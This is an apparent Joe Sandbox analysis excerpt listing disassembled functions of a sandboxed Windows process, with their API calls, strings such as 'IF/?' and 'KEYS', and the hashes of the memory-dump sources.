                                                                        • Part of subcall function 00049A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A6A
                                                                      • _get_osfhandle.MSVCRT ref: 000586E3
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 000586EB
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 0005872A
                                                                      • _get_osfhandle.MSVCRT ref: 00058743
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0005874B
                                                                        • Part of subcall function 00049B3B: _get_osfhandle.MSVCRT ref: 00049B4E
                                                                        • Part of subcall function 00049B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00080AF0,000000FF,0007A7F0,00002000,00000000,00000000), ref: 00049B8E
                                                                        • Part of subcall function 00049B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0007A7F0,-00000001,?,00000000), ref: 00049BA3
                                                                      • longjmp.MSVCRT(00080A30,00000001), ref: 000587CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                      • String ID:
                                                                      • API String ID: 1333215474-0
                                                                      • Opcode ID: 2e002650d1a0d276f8731474c2d7a582d4fc3f490578ef06c0591f7ca848e767
                                                                      • Instruction ID: bc9a2f60089449f5fb6f354aca89985033b1b6e29a4fce3e53882bdfa5aaedb5
                                                                      • Opcode Fuzzy Hash: 2e002650d1a0d276f8731474c2d7a582d4fc3f490578ef06c0591f7ca848e767
                                                                      • Instruction Fuzzy Hash: 2D51D770740305EBEB24AB74D849BAFB3E4EB04712F10853AED42E7582EB74DD448B55
                                                                      Function 00046150 Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • iswspace.MSVCRT ref: 000461E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$iswspace
                                                                      • String ID:
                                                                      • API String ID: 3458554142-0
                                                                      • Opcode ID: ed0c90a824f88792f4bdd8b6c7863786a41bb907e24842aced6e9c8d1ca81c30
                                                                      • Instruction ID: b53b4db295485df19c738345788eeb926d1adc9b607e8339ce568f4c3a8398fe
                                                                      • Opcode Fuzzy Hash: ed0c90a824f88792f4bdd8b6c7863786a41bb907e24842aced6e9c8d1ca81c30
                                                                      • Instruction Fuzzy Hash: 1D91A0B0A04614DEEB24DF65DC45AAE77F4FF45301F14812EE80AE7290EB7A5884CF55
                                                                      Function 0004A6A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp
                                                                      • String ID: ELSE$IF/?
                                                                      • API String ID: 2081463915-1134991328
                                                                      • Opcode ID: 1a8d1ce0b5dbc294ac340c1c66414e308df52721c76c390718fb75745e990fed
                                                                      • Instruction ID: 27ef1425f773a811c3f51b10896e4f0706ed1424cfe8be8383dbce04c309e334
                                                                      • Opcode Fuzzy Hash: 1a8d1ce0b5dbc294ac340c1c66414e308df52721c76c390718fb75745e990fed
                                                                      • Instruction Fuzzy Hash: 1E517DB27443029EF7749B35AC49F6B33E0AB41311F14043EE8469A192EEB9D844C75A
                                                                      Function 000562C0 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0005643A: NtOpenThreadToken.NTDLL ref: 00056454
                                                                        • Part of subcall function 0005643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 0005646C
                                                                        • Part of subcall function 0005643A: NtClose.NTDLL ref: 000564BD
                                                                      • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 000563B5
                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 000563E3
                                                                      • RtlNtStatusToDosError.NTDLL ref: 00061EF4
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00061EFB
                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00061F6B
                                                                      • wcsstr.MSVCRT ref: 00061F86
                                                                      • wcsstr.MSVCRT ref: 00061FA4
                                                                        • Part of subcall function 0005640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00069C96,0005FDFA,00000000,?), ref: 0005642F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                      • String ID:
                                                                      • API String ID: 1313749407-0
                                                                      • Opcode ID: 7609d448af5e0ec7be411b41224d3ef64cbc94a71a700cb6070863cca1cd759e
                                                                      • Instruction ID: 04dfc376507436663ee8c7aecad0f14b6778e9b7951af4e3784970daf8a79555
                                                                      • Opcode Fuzzy Hash: 7609d448af5e0ec7be411b41224d3ef64cbc94a71a700cb6070863cca1cd759e
                                                                      • Instruction Fuzzy Hash: 33510171A002298BEF609F649C886EF72E5EF54311F5800B9ED09E7241EB75DE89CF94
                                                                      Function 00069A7D Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00069AC2
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00069B22
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00069B32
                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00069BAD
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00069BB8
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00069BCB
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 00069BF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Error$CurrentDirectoryModememset$Last
                                                                      • String ID:
                                                                      • API String ID: 1725644760-0
                                                                      • Opcode ID: ab6856c9e358ee936432c10d02ebe664c0f33a080766053f8a49e1e321e6b92f
                                                                      • Instruction ID: 0c5cc91d92fc736a1b8106100e32c614bdbb286ea4765c28a356b16858b738e8
                                                                      • Opcode Fuzzy Hash: ab6856c9e358ee936432c10d02ebe664c0f33a080766053f8a49e1e321e6b92f
                                                                      • Instruction Fuzzy Hash: 71418171A002189BEF14DFA4EC85BEEB7F9FF48710F0481A9E905E7250EB789944CB55
                                                                      Function 000481EC Relevance: 10.5, APIs: 7, Instructions: 41synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 00048203
                                                                      • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0004820E
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 00048229
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0005B0AB
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00067FC9,?,000699AE,00000000,?,00000000,0005CF94,00000000,?), ref: 0005B0C1
                                                                      • fprintf.MSVCRT ref: 0005B0D5
                                                                      • fflush.MSVCRT ref: 0005B0E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                      • String ID:
                                                                      • API String ID: 4271573189-0
                                                                      • Opcode ID: dd0c5f996075cd8115259f6ba9b313841c4388cef3a5f427be8ecddf19100e4c
                                                                      • Instruction ID: ced8d61bfdd69825fdbb0c949c972b4505eaed10e62a94ca87f12bf482033a98
                                                                      • Opcode Fuzzy Hash: dd0c5f996075cd8115259f6ba9b313841c4388cef3a5f427be8ecddf19100e4c
                                                                      • Instruction Fuzzy Hash: 6601A230505210FFFB106BE8ED0EA8A3BACFF0A325F104256F555A21F2CBBD16409B66
                                                                      Function 00053CD0 Relevance: 9.4, APIs: 6, Instructions: 438COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00053D30
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00053E3D
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00053E88
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$FullNamePath
                                                                      • String ID:
                                                                      • API String ID: 3158150540-0
                                                                      • Opcode ID: 9be5daa99d9da970f24f26531efbecdcb6dc083276296caf2c90eb7538708819
                                                                      • Instruction ID: 81f126763f0140070507102cc2b1fd90e66492a26dbd8513cb08f9ea8eb4c2c0
                                                                      • Opcode Fuzzy Hash: 9be5daa99d9da970f24f26531efbecdcb6dc083276296caf2c90eb7538708819
                                                                      • Instruction Fuzzy Hash: 7602C234A001169BDB64DF68DC997BAB3F1FF48311F1881A9DC0A97291D738AE86CF54
                                                                      Function 0004498F Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0005858D
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00058595
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 000585D4
                                                                      • _get_osfhandle.MSVCRT ref: 000585ED
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 000585F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                                      • String ID:
                                                                      • API String ID: 1066134489-0
                                                                      • Opcode ID: 0db2e1834e086c0793218d657485009fe6a779c391c8e6b392ed8a15b7cb1b9b
                                                                      • Instruction ID: 62a937eb09e1da9400b8d2125dba6af0ed9fb28999ad56d84bd2f74f6548909c
                                                                      • Opcode Fuzzy Hash: 0db2e1834e086c0793218d657485009fe6a779c391c8e6b392ed8a15b7cb1b9b
                                                                      • Instruction Fuzzy Hash: E2419171B002109BEF249F78D889BAFB3A5EB40346F14847AED46EB186EE74DD44CB51
                                                                      Function 0004998D Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00049A11: _get_osfhandle.MSVCRT ref: 00049A1C
                                                                        • Part of subcall function 00049A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004793A,00000104,?), ref: 00049A2B
                                                                        • Part of subcall function 00049A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A47
                                                                        • Part of subcall function 00049A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A56
                                                                        • Part of subcall function 00049A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A61
                                                                        • Part of subcall function 00049A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A6A
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,00080AF0,00000002,?,?,0005A669,%s %s ,?,?,00000000), ref: 000499DC
                                                                      • _get_osfhandle.MSVCRT ref: 000499EC
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0005A669,%s %s ,?,?,00000000), ref: 000499F4
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 00049A09
                                                                        • Part of subcall function 00049B3B: _get_osfhandle.MSVCRT ref: 00049B4E
                                                                        • Part of subcall function 00049B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00080AF0,000000FF,0007A7F0,00002000,00000000,00000000), ref: 00049B8E
                                                                        • Part of subcall function 00049B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0007A7F0,-00000001,?,00000000), ref: 00049BA3
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                      • String ID:
                                                                      • API String ID: 4057327938-0
                                                                      • Opcode ID: 0be847a2ee7a54dfcd32967d41e48c544ce8a9902603930391637b4f629117a9
                                                                      • Instruction ID: 737da3afb7c8bc4b638cd3b3803d015de2edad7d9c857a7704c793d57cffd0d7
                                                                      • Opcode Fuzzy Hash: 0be847a2ee7a54dfcd32967d41e48c544ce8a9902603930391637b4f629117a9
                                                                      • Instruction Fuzzy Hash: AA21D872744305AFF7346AA85C8AF6B2298EB81B56F14003FFA46C61C2EEA4CC048295
                                                                      Function 00067540 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • _wcsicmp.MSVCRT ref: 000675AC
                                                                      • _wcsicmp.MSVCRT ref: 000675CB
                                                                      • _wcsicmp.MSVCRT ref: 000675F1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmpwcschr$iswspace
                                                                      • String ID: KEYS$LIST$OFF
                                                                      • API String ID: 3924973218-4129271751
                                                                      • Opcode ID: 8a3282a8a3fa891d7e60b26dcabdaa47e9fa9d8f493fd016947fa2ab941a8954
                                                                      • Instruction ID: bdf3eea1119f7f4596c7ea79fb0abf64953ee804ea5f8e9684ae63a65eefa8ea
                                                                      • Opcode Fuzzy Hash: 8a3282a8a3fa891d7e60b26dcabdaa47e9fa9d8f493fd016947fa2ab941a8954
                                                                      • Instruction Fuzzy Hash: 1211803120CB009AF3296725DC8697B73DAFBC5728364407FF50B850C1EEA85A01835D
                                                                      Function 0004DD98 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0004DDD6
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000001), ref: 0004DDE5
                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 0004DDF0
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 0004DDF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 513048808-0
                                                                      • Opcode ID: 460a74be10b8c665baf9300cbd015e44c0ccdc1e892621948d8197fcc281c4c0
                                                                      • Instruction ID: 8a074f2ea4ff35abc8a6d82b1bc9f2f6418b0b5e94c31f6943e819e1af8e4823
                                                                      • Opcode Fuzzy Hash: 460a74be10b8c665baf9300cbd015e44c0ccdc1e892621948d8197fcc281c4c0
                                                                      • Instruction Fuzzy Hash: A81123B3C18214ABFB2547689D4CB2A3AE8F787338F240237E816924A0C63D4D01CB95
                                                                      Function 00049A11 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00049A1C
                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004793A,00000104,?), ref: 00049A2B
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A47
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A56
                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A61
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 513048808-0
                                                                      • Opcode ID: 63ce04006d68f7a5b7e4ae6f41e159ef166c2b9e3c7203ab628c95dd1c5c33f6
                                                                      • Instruction ID: e0ee941d44815d47c5ebb5fc63767a6622392d6250f0d1b239987d860a637289
                                                                      • Opcode Fuzzy Hash: 63ce04006d68f7a5b7e4ae6f41e159ef166c2b9e3c7203ab628c95dd1c5c33f6
                                                                      • Instruction Fuzzy Hash: 7101A2B39040206BAA2157B89C4DD7B3AACF787734B250336F866D24D0D9788C1286E7
                                                                      Function 0004DA30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                      • memset.MSVCRT ref: 0005D954
                                                                      • longjmp.MSVCRT(00080A70,000000FF,00000000,000725C2,000725C0,?,?,?,?,0004D980), ref: 0005D96D
                                                                      • memcpy.MSVCRT(?,00000000,00002000,00000000,000725C2,000725C0,?,?,?,?,0004D980), ref: 0005D987
                                                                      • longjmp.MSVCRT(00080A70,000000FF,000725C2,000725C0,?,?,?,?,0004D980), ref: 0005D9D3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                      • String ID: 0123456789
                                                                      • API String ID: 2034586978-2793719750
                                                                      • Opcode ID: db81adf32ff9168bc4a9a5f2d9a8af2b4e01df434221d833e00ca547538d24f8
                                                                      • Instruction ID: 44a9ded0ab45dfd509d13b53fb4a1736a2f1df2d636dbf97cced70da378e81e7
